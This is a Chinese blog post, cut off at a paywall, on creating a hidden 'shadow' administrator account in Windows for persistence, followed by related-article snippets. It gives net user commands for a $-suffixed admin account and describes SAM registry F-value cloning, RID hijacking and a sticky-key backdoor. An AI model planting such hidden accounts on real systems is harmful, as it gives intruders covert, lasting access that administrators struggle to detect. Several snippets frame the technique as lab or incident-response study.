权限维持-Windows影子用户

最新推荐文章于 2025-02-28 06:00:00 发布
最新推荐文章于 2025-02-28 06:00:00 发布
阅读量1.6k 收藏 9
点赞数 2
分类专栏: 权限维持 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52829570/article/details/127727868
版权

前言

该文章只进行技术分享与探讨,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关

在windows中创建一个影子用户,影子用户拥有和正常用户一样的权限和功能

影子用户只可在注册表中看到

演示环境:windows server 2012(靶机)

前提

需要一个高权限用户(administrator 或者是 system)

一、

1. 创建用户test(后面加个$符号是为了使net user 无法查看到)

net user test$ a+1 /add

 2. 将test用户添加到管理员组

net localgroup administrators test$ /add

 3. 将test用户移出users组

net localgroup users test$ /del

 二、

 打开注册表

 找到HKEY_LOCAL_MACHINE\SAM\SAM

最低0.47元/天 解锁文章
.NET 通过创建系统影子账户实现维持权限
ahhacker86的专栏
04-08 56
综上,通过我们在正常的系统用户名后面添加 $ 符号,可以创建影子账户,从而提高了账户的隐蔽性。其中username是新用户用户名,以$符号结尾,如前文所述在 Windows中,使用 $ 结尾的用户名通常不会显示在操作系统的用户列表中,因此这样的账户很难被发现,可以有效地隐藏账户,增加其隐蔽性。这里使用WinNT协议,该协议出现在Windows NT 4.0 及更高版本的计算机或域中的目录服务,专用于访问和管理 Windows 网络中的资源,包括本地用户和组、远程计算机上的用户和组、以及域用户和组。
51-5 权限维持2 - 影子账号(隐藏用户
weixin_43263566的博客
07-04 390
权限维持技术(Persistence,也称为权限持久化)是一种能够在系统重启、用户更改密码或其他可能导致访问中断的情况下保持对系统访问的技术。例如,它包括创建系统服务、利用计划任务、修改系统启动项或注册表、以及映像劫持等方法。影子账户是指隐藏的账户,无论通过计算机管理还是命令行都无法直接查看,只能在注册表中找到其信息。通常,通过创建具有管理员权限影子账户来实现在目标主机上的权限维持,但需要拥有管理员级别的权限
Windows影子账户创立
A272036149的博客
07-20 947
Windows sever2008 影子账户
Windows影子用户及其相应的漏洞后渗透
weixin_51339377的博客
04-14 2109
#当获得一条shell后,可以创建一个影子用户,通过影子用户可以行驶正常用户的所有权限与功能, 并且只可在注册表中被检测出来---(应急响应注册表很重要) 1.首先需要拥有权限创建一个Administrator用户,并分配管理员权限。 net user haha$ 123 /add #创建一个新用户haha 密码是123 net localgroup administrators haha$ /add #将该新用户移动到管理员组下 net localgroup users ...
Windows权限维持--创建隐藏账户(影子账户)
qq_54735393的博客
11-03 4685
影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持
【Web安全-Windows创建影子账户】
qq_45927819的博客
03-14 1220
系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。
windows中建立影子用户
weixin_34249678的博客
12-21 334
新建个用户 打开注册表 在SAM里包含本地账户的信息 所以管理员需要先取得权限才能浏览该项 打开该项直到能看到账户 导出新建的用户的name和对应user项 和管理员对应的user值 将管理员注册表中’f’值粘贴到新建账户注册表中 要讲更改过的值更新到新建用户中 得先把新建用户删掉 然后双击 影子账户为ab 没有做以上操作用户为user...
网安知识系列:Windows影子用户Windows权限维持
weixin_54626591的博客
05-30 237
Windows影子用户Windows权限维持
[权限维持] Windows 权限维持 —— 影子账户后门 - 基础隐藏
最新发布
Blue17 の 小窝
02-28 594
如上,远程登录成功,由于我们上面创建影子账号的 Shell 是 Hack3rX 里的 Administrator,所以我们创建的 hacker用户很自然也归属于域中,反之,如果创建用户的是本地用户,那么​ 也应该以。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。如上,可以看到,基础款的影子账户的隐蔽性还是不行,太容易被发现了,下一章笔者将介绍高级隐藏款,可以防止绝大多数的排查。
[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户
Blue17 の 小窝
02-28 857
问题描述  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。这部分我们站在防守者视角,来排查下高级款的影子账户后门。
windows操作系统后门--影子账户
qq_63283137的博客
01-31 703
passwd /add 在net user无法查看,但是本地用户和组可以查看。ceshi账户回来了,且权限跟admin一样,只能注册表删除账户。administrator账户,F值拷贝到ceshi账户F中。ceshi账户,将admin的F值拷贝到当前F值中。3.导出ceshi用户注册表文件。2.运行regedit注册表。5.再将导出的注册表导入。4.删除ceshi账户。
网安系列:Windows影子账户创建与防御
weixin_54626591的博客
05-30 318
Windows影子账户创建与防御
Windows影子账户
qq_45427131的博客
03-18 831
影子账户 应急响应
内网权限维持——创建影子账户
qq_55202378的博客
08-03 1064
windows中每个用户和组都会有一个独特的SID,而系统就是通过用户之间不同的SID来区分每个用户账户和组的。whoami /user # 查看当前用户的SIDSID的最后一部分为RID,在windows中,每新增一个组或用户,RID都会递增一位。wmic useraccount get name, sid # 查看系统中所有用户的SID在windows中,部分应用是根据当前会话用户的SID来判断用户权限的。也就是说,如果用户A的RID被替换为用户B的RID,那么用户A将有用户B的部分权限
windows操作系统实验之影子账户
m0_55525922的博客
04-14 710
Windows系统登录界面状态下,粘滞键仍可以以连续按5下SHIFT键运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算。找到名字为sethc的文件(随便点击一个文件,按s键就可以快速查找s开头的文件),也就是粘滞键,把文件名改成任意名。是计算机最高的权限,那么就可以输入命令修改账户的密码,或者新建一个用户,赋予它管理员的权限。然后在Users中找到对应数字的F值,将3e9的F值替换为1f4的F值。
Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持
Longwaer
01-10 1980
通过学习掌握Windows权限维持小技巧,更好的运行相关知识点来进行权限维持,更快知晓权限维持的作用。
Windows隐藏账户处置(影子账户)
weixin_51198941的博客
07-11 1044
本次实验环境来源:深信服产业教育云平台仅供学习交流使用,请勿用于非法用途,违者一律自行承担所有风险。
权限维持-关于影子用户
m0_64815693的博客
06-03 676
权限维持-关于影子用户
windows 7 使用注册表创建影子账户和隐藏账户
weixin_33847182的博客
04-17 466
windows 7 使用注册表创建影子账户和隐藏账户 1.打开Windows 7 2.首先在Windows创建一个普通帐号zhangsan,密码也是123 3.在命令行中输入"regedit"打开注册表,打开:HKEY_LOACL_MACHINE\SAM\SAM。 4.首先大家发现无法打开SAM子项目,要把权限给予并刷新 ...
Windows影子用户
08-21
Windows影子用户是一种相对隐蔽的用户,在Windows系统中一般在后渗透的权限维持阶段会使用到。影子用户创建方法可以使用ShadowUser.exe工具,该工具可以生成一个带有$符号的账户,使得该用户不会在Windows的登录...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

whathay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值